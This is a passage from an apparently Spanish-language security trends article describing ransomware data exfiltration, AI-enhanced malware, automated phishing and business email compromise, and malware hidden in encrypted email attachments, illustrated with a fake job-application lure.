Vemos los primeros indicios de que los ataques de Exfiltración de Datos basados en software de rescate aumentarán considerablemente. La última gran tendencia de extorsión de Ransomware que se construye para encriptar tus datos y chantajear a la víctima para que pague por la clave de desencriptación sigue ahí fuera… pero la exfiltración de datos crece rápidamente: en lugar de manipular los datos, éstos son robados y extraídos a almacenes externos. Los atacantes (a veces incluso proporcionando pruebas de la posesión de los datos) amenazan entoces con publicarlos si no pagas. Los datos robados pueden ser tanto medios privados como propiedad intelectual, secretos de empresa o datos de clientes. Esta tendencia es bastante nueva, pero se espera que crezca rápidamente.

 

3. Malware mejorado por la IA

 

El uso de la inteligencia artificial (IA) aumentará para los ciberataques: ya se han visto falsificaciones, por ejemplo, para engañar incluso a los nuevos reconocimientos de voz, y también diferentes técnicas para mejorar el objetivo de los ataques. Una de las principales amenazas basadas en la IA, es que el malware se vuelve consciente del sistema del host. Los nuevos programas maliciosos basados en la IA son capaces de evaluar el sistema en el que están instalados y sus vulnerabilidades, especialmente el sistema operativo que utilizan. Luego se entera del estado de los parches del sistema. Basándose en las vulnerabilidades que se encuentran en el host infectado, el malware mejorado por la IA descarga módulos específicos de los servidores de comando y control. El malware inicial ya sabe que los módulos descargados tendrán éxito en la ejecución, porque está diseñado para utilizar las vulnerabilidades detectadas del sistema anfitrión.

 

4. Smart Phishing

 

Los correos electrónicos de phishing se volverán más inteligentes, más realistas y más automatizados. Por lo tanto, la cantidad de correos electrónicos de phishing difíciles de determinar en los buzones de entrada aumentará. Por ejemplo, muchas redes sociales ofrecen APIs que les permiten escalar el Business Email Compromise (BEC) a un nivel completamente nuevo – tanto de aspecto real como sin esfuerzo – totalmente automatizado. Una vez más, esta escalada de ataques realistas podría afectar a empresas de todos los tamaños.

 

5. Malware con archivos adjuntos encriptados y ocultos

 

Hemos visto un aumento de la cantidad de Malware escondido en archivos adjuntos encriptados a partir de mediados de 2019, el cual sigue creciendo. Esto suena muy abstracto e improbable, pero imagina que estás trabajando en RR. HH. y recibes un correo electrónico con una solicitud para un trabajo que has publicado en Stepstone. El solicitante escribe una carta de presentación que coincide perfectamente con la descripción y su currículum vitae se adjunta en el PDF que puede abrirse con la contraseña «yourjoboffer2020!». ¿Caerías en la trampa?

 

 

Más información: